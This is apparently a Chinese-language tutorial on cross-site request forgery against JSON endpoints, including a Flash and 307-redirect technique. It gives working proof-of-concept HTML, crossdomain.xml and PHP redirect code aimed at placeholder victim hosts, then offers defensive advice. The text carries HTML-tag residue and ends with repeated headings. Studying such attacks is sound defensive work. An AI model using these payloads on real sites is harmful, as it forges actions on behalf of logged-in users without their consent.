CSRF（跨站点请求伪造）在Flash中的利用技术分析<\/h1>

0x00 前言<\/h2>

CSRF（Cross-site request forgery）跨站请求伪造，是一种对网站的恶意利用技术。与XSS不同，CSRF通过伪装来自受信任用户的请求来利用受信任的网站。CSRF攻击被认为比XSS更具危险性，因为：<\/p>

浏览器请求会自动包含与网站相关的凭证（会话cookie、IP地址、Windows域凭证等）<\/li>

CSRF攻击往往难以防范且防范资源较少<\/li> <\/ul>

0x01 主要攻击场景<\/h2>

场景1：服务器仅检查JSON数据格式<\/h3>

服务器查找JSON格式的数据<\/li>
不验证Content-Type头部<\/li>

攻击方法：使用Fetch请求或表单构造JSON数据<\/li> <\/ul>

场景2：服务器验证JSON数据格式和Content-Type<\/h3>

服务器要求数据为JSON格式<\/li>
验证Content-Type为application\/json<\/li>

攻击方法：使用Flash和307重定向技术<\/li> <\/ul>

开发案例1：仅验证JSON格式的攻击方法<\/h2>

使用Fetch请求<\/h3>

<html<\/span>>
<\/span><\/span><title<\/span>>JSON CSRF POC<\/title<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><center<\/span>>
<\/span><\/span><h1<\/span>> JSON CSRF POC <\/h1<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>fetch<\/span>('http:\/\/vul-app.com'<\/span>, {
<\/span><\/span>  method<\/span>:<\/span> 'POST'<\/span>, 
<\/span><\/span>  credentials<\/span>:<\/span> 'include'<\/span>, 
<\/span><\/span>  headers<\/span>:<\/span> {'Content-Type'<\/span>:<\/span> 'text\/plain'<\/span>}, 
<\/span><\/span>  body<\/span>:<\/span> '{"name":"attacker","email":"attacker.com"}'<\/span>
<\/span><\/span>});
<\/span><\/span><\/script<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>"#"<\/span>>
<\/span><\/span><input<\/span> type<\/span>=<\/span>"button"<\/span> value<\/span>=<\/span>"Submit"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/center<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>使用表单构造JSON数据<\/h3>
<html<\/span>>
<\/span><\/span><title<\/span>>JSON CSRF POC<\/title<\/span>>
<\/span><\/span><center<\/span>>
<\/span><\/span><h1<\/span>> JSON CSRF POC <\/h1<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>http:\/\/vul-app.com<\/span> method<\/span>=<\/span>post<\/span> enctype<\/span>=<\/span>"text\/plain"<\/span>>
<\/span><\/span><input<\/span> name<\/span>=<\/span>'{"name":"attacker","email":"attacker@gmail.com","ignore_me":"'<\/span> value<\/span>=<\/span>'test"}'<\/span> type<\/span>=<\/span>'hidden'<\/span>>
<\/span><\/span><input<\/span> type<\/span>=<\/span>submit<\/span> value<\/span>=<\/span>"Submit"<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/center<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>开发案例2：验证JSON格式和Content-Type的攻击方法<\/h2>
攻击要求<\/h3>

精心制作的Flash文件(.swf)<\/li>
跨域XML文件(crossdomain.xml)<\/li>
带有307状态码的PHP文件<\/li>
<\/ol>
攻击步骤<\/h3>

创建包含JSON数据的Flash文件<\/li>
在攻击者网站根目录放置crossdomain.xml<\/li>
创建307重定向的PHP文件<\/li>
<\/ol>
crossdomain.xml内容<\/h4>
<cross-domain-policy><\/span>
<\/span><\/span><allow-access-from<\/span> domain=<\/span>"*"<\/span> secure=<\/span>"false"<\/span>\/><\/span>
<\/span><\/span><allow-http-request-headers-from<\/span> domain=<\/span>"*"<\/span> headers=<\/span>"*"<\/span> secure=<\/span>"false"<\/span>\/><\/span>
<\/span><\/span><\/cross-domain-policy><\/span>
<\/span><\/span><\/code><\/pre>307重定向PHP文件<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ redirect automatically
<\/span><\/span><\/span><\/span>header<\/span>("Location: https:\/\/victim.com\/user\/endpoint\/"<\/span>, true<\/span>, 307<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>攻击原理<\/h3>

Flash文件请求PHP文件<\/li>
PHP文件返回307重定向到目标端点<\/li>
307重定向会将Flash文件中的JSON数据一并POST到目标端点<\/li>
浏览器中需要安装Flash插件才能执行此攻击<\/li>
<\/ul>
注意事项<\/h2>

这些攻击方法仅适用于：

应用程序仅依赖JSON格式数据或Content-Type检查<\/li>
没有额外的CSRF token或Referer检查机制<\/li>
<\/ul>
<\/li>
使用Flash的攻击方法需要浏览器安装Flash插件<\/li>
如果Flash文件和重定向页面在同一域，则不需要crossdomain.xml文件<\/li>
<\/ol>
防御建议<\/h2>

实施CSRF token机制<\/li>
检查Referer头部<\/li>
对于JSON API，避免仅依赖Content-Type检查<\/li>
禁用不必要的Flash内容<\/li>
实施严格的CORS策略<\/li>
<\/ol>
工具推荐<\/h2>

使用FFDec编辑和编译Flash文件<\/li>
Burpsuite的Engagement Tools可用于构造基本CSRF POC<\/li>
<\/ol>
参考文献<\/h2>

http:\/\/research.rootme.in\/forging-content-type-header-with-flash<\/li>
http:\/\/blog.opensecurityresearch.com\/2012\/02\/json-csrf-with-parameter-padding.html<\/li>
<\/ol>

CSRF（跨站点请求伪造）在Flash中的利用技术分析<\/h1>

0x01 主要攻击场景<\/h2>

开发案例1：仅验证JSON格式的攻击方法<\/h2>

开发案例2：验证JSON格式和Content-Type的攻击方法<\/h2>

参考文献<\/h2> http:\/\/research.rootme.in\/forging-content-type-header-with-flash<\/li> http:\/\/blog.opensecurityresearch.com\/2012\/02\/json-csrf-with-parameter-padding.html<\/li> <\/ol>

参考文献<\/h2>

http:\/\/research.rootme.in\/forging-content-type-header-with-flash<\/li>
http:\/\/blog.opensecurityresearch.com\/2012\/02\/json-csrf-with-parameter-padding.html<\/li> <\/ol>